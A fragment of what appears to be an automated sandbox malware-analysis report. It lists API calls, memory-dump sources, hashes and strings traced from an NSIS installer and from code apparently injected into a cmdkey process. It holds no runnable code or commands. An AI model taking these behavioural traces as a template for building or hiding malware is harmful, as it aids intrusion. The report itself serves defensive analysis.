                                • CreateDialogParamW.USER32(0000006F,00000000,0040362A,00000000), ref: 004033B3
                                • ShowWindow.USER32(00000000,00000005), ref: 004033C1
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                • String ID:
                                • API String ID: 2102729457-0
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: 0$Flst
                                • API String ID: 0-758220159
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: 0$0
                                • API String ID: 3446177414-203156872
                                APIs
                                  • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,00428D00,NSIS Error), ref: 00406B02
                                  • Part of subcall function 00406BA0: CharNextW.USER32(?,?,?,00000000,00425A48,0040662A,00425A48,00425A48,00000000,?,?,00406716,?,00000000,76073420,?), ref: 00406BAF
                                  • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BB4
                                  • Part of subcall function 00406BA0: CharNextW.USER32(00000000), ref: 00406BCE
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406D8D
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                  • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DA1
                                  • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,00436800,00000000,00436800,00403C8C,00436800,76073420,0040399D), ref: 00406DB9
                                • lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,76073420,?), ref: 00406667
                                • GetFileAttributesW.KERNEL32(00425A48,00425A48), ref: 00406678
                                  • Part of subcall function 004065AA: FindFirstFileW.KERNEL32(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                  • Part of subcall function 004065AA: FindClose.KERNEL32(00000000), ref: 004065C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                • String ID: HZB
                                • API String ID: 1879705256-1498320904
                                APIs
                                • IsWindowVisible.USER32(?), ref: 004058DF
                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405927
                                  • Part of subcall function 004054C3: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Window$CallMessageProcSendVisible
                                • String ID:
                                • API String ID: 3748168415-3916222277
                                APIs
                                • DispatchMessageW.USER32(?), ref: 004061F6
                                • PeekMessageW.USER32(?,00000000,?,T5@,00000001), ref: 0040620A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Message$DispatchPeek
                                • String ID: T5@
                                • API String ID: 1770753511-1075436632
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:

                                Execution Graph

                                Execution Coverage:0.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:9
                                Total number of Limit Nodes:1

                                Control-flow Graph

                                APIs
                                • NtQueryInformationProcess.NTDLL ref: 0371F276
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763721591.0000000003710000.00000040.00000800.00020000.00000000.sdmp, Offset: 03710000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3710000_cmdkey.jbxd
                                Similarity
                                • API ID: InformationProcessQuery
                                • String ID: r,_$0
                                • API String ID: 1778838933-1867104059

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 150 38834e0-38834ec LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 143 3882b80-3882b8c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 144 3882b90-3882b9c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 145 3882bc0-3882bcc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 141 3882b00-3882b0c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 142 3882b10-3882b1c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 140 3882a80-3882a8c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0

                                Control-flow Graph

                                control_flow_graph 149 3882e50-3882e5c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: eec5c9e22f7da737c9e8f060fe5a3cef7598ccb4be2ca8a782110d024a227a11
                                • Instruction ID: e57b48b337841997e0a4c91c74e08d17528732c7bf054b03e44b49a8189fc945
                                • Opcode Fuzzy Hash: eec5c9e22f7da737c9e8f060fe5a3cef7598ccb4be2ca8a782110d024a227a11
                                • Instruction Fuzzy Hash: 9890026135100942E900A1984514B060005C7E3301F55C4DAE205D554DC729CC567136

                                Control-flow Graph

                                control_flow_graph 148 3882d10-3882d1c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 6d2397709e6b8baf935aa03249ad4b2cdbab6e5e28ac728e2a4916bb6483d6d1
                                • Instruction ID: 2d1239ca4294a6879d7ddd9b4f728fffe20f7bdfcf672a0f39939b1e0ce9289f
                                • Opcode Fuzzy Hash: 6d2397709e6b8baf935aa03249ad4b2cdbab6e5e28ac728e2a4916bb6483d6d1
                                • Instruction Fuzzy Hash: 3890023121100913E911A1984604707000987D2241F95C8D7A141D558DD7668956B131

                                Control-flow Graph

                                control_flow_graph 147 3882cf0-3882cfc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: d79ea652f1405effc82f4e2fbc376debe8b75aac5c2279e9f479d3e6bd5362a7
                                • Instruction ID: 33efd5ed6966615d876db41682d52984c6c7538f45146a68c4ee97815e984c0a
                                • Opcode Fuzzy Hash: d79ea652f1405effc82f4e2fbc376debe8b75aac5c2279e9f479d3e6bd5362a7
                                • Instruction Fuzzy Hash: 04900221252046526D45F1984504507400697E2241795C4D7A240D950CC636985AE631

                                Control-flow Graph

                                control_flow_graph 146 3882c30-3882c3c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: ae102ebf5b78e659271727ab29627921389a3245bc7b1da783d2ddd8187802e6
                                • Instruction ID: bdfa244206236c7ed556c9e00746d3f445d115aa568fdded6cc9b13ff2854c05
                                • Opcode Fuzzy Hash: ae102ebf5b78e659271727ab29627921389a3245bc7b1da783d2ddd8187802e6
                                • Instruction Fuzzy Hash: BC90022922300502E980B198550860A000587D3202F95D8DAA100E558CCA25886D6331

                                Control-flow Graph

                                control_flow_graph 136 3882b2a-3882b2f 137 3882b3f-3882b46 LdrInitializeThunk 136->137 138 3882b31-3882b38 136->138
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: b659a6c82b54d7fa2f9c0ffe44407cbd31f7319db34a931571661d958f62c322
                                • Instruction ID: 4a6602645e34d62bcc1e7094452a941ea72bb7f8945438575d0e4ca89dcedf2f
                                • Opcode Fuzzy Hash: b659a6c82b54d7fa2f9c0ffe44407cbd31f7319db34a931571661d958f62c322
                                • Instruction Fuzzy Hash: 07B09B719024C6C5EE11E7A4470C717794467D1701F19C4D6D2468645E8739C095F275
                                Strings
                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 038B4592
                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 038B4530
                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038B4507
                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 038B454D
                                • Execute=1, xrefs: 038B451E
                                • ExecuteOptions, xrefs: 038B44AB
                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 038B4460
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID:
                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                • API String ID: 0-484625025
                                • Opcode ID: ebc766dd0d6de22ee6e38c5cce05cd859c0acc0c08f7a15553284690d08a6ffc
                                • Instruction ID: 65e8a9fe1b79f06038b6c74c113d387c03074373fc30a92ab4b10edbe1382318
                                • Opcode Fuzzy Hash: ebc766dd0d6de22ee6e38c5cce05cd859c0acc0c08f7a15553284690d08a6ffc
                                • Instruction Fuzzy Hash: E351F871A003196ADF20EBD9DC86FFD77A9AF04744F1804E9E505EB281EB70EA45CB61
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.21763793954.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                • Associated: 00000005.00000002.21763793954.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000005.00000002.21763793954.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_3810000_cmdkey.jbxd
                                Similarity
                                • API ID:
                                • String ID: $$@
                                • API String ID: 0-1194432280
                                • Opcode ID: 548cdc11964e9ed302b50836f7895bcb07f7c903932dc505e9dbacda9c8e44c4
                                • Instruction ID: 4077c23375fe592eeaa5e205bbc89ac9b005d271f5d4f862f3dce633cde1b5fa
                                • Opcode Fuzzy Hash: 548cdc11964e9ed302b50836f7895bcb07f7c903932dc505e9dbacda9c8e44c4
                                • Instruction Fuzzy Hash: F2813AB1D012699BDB35DB98CC44BEEB6B8AF48710F0445EAE909F7250D7709E84CFA1